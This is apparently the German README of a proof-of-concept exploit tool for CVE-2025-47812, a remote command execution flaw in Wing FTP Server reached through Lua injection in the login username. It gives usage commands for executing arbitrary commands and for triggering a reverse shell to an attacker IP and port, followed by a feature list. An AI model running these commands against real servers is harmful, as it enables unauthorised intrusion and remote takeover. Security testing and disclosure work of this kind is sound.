
Exploit für Remote Command Execution in Wing FTP Server (CVE-2025-47812)
Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2025-47812, eine Remote-Befehlsausführungs-Schwachstelle (RCE) in Wing FTP Server. Ein Angreifer kann beliebige Lua-basierte Systembefehle injizieren und ausführen, indem er den Parameter username während der Authentifizierung missbraucht, was zu einer vollständigen Remote-Codeausführung führt.
found_uids.txtEinfachen Shell-Befehl ausführen:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
Reverse Shell auslösen:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
Dry-Run-Modus (es werden keine Anfragen gesendet):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
Dieses Projekt ist nur für Bildungszwecke und autorisierte Sicherheitstests gedacht.
Verwenden Sie dieses Tool nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
| Feature/Verbesserung | Beschreibung |
|---|
| ✅ Argument-Parsing | argparse-CLI-Unterstützung für den nicht-interaktiven Modus hinzugefügt |
| 🔐 Eingabevalidierung | Stellt gültige URL/IP/Port sicher, bevor der Exploit versucht wird |
| 📦 Header-Refactoring | HTTP-Header in eine wiederverwendbare Funktion extrahiert |
| 📄 UID-Protokollierung | Speichert erfolgreiche UID-Tokens in found_uids.txt |
| 🧪 Dry-Run-Modus | Ermöglicht sicheres Testen ohne Senden von Anfragen (--dry-run) |
| 🕒 Timeout + Wiederholungen | Fügt Anfragetimeout und automatische Wiederholungsversuche bei Fehlern hinzu |
| 🧼 Payload-Lesbarkeit | Lua-Injektionszeichenfolge für Klarheit und Wartung neu formatiert |
| 📊 Strukturierte Ausgabe | Serverantworten und Payload-Informationen mit Trennzeichen für einfaches Lesen umschlossen |
| ⚠️ Statuscode-Prüfungen | Warnt den Benutzer, wenn das Ziel unerwartete HTTP-Statuscodes zurückgibt |
| 📝 Protokollierungssystem | Ersetzt print() durch das Python-Modul logging für bessere Verbositätskontrolle |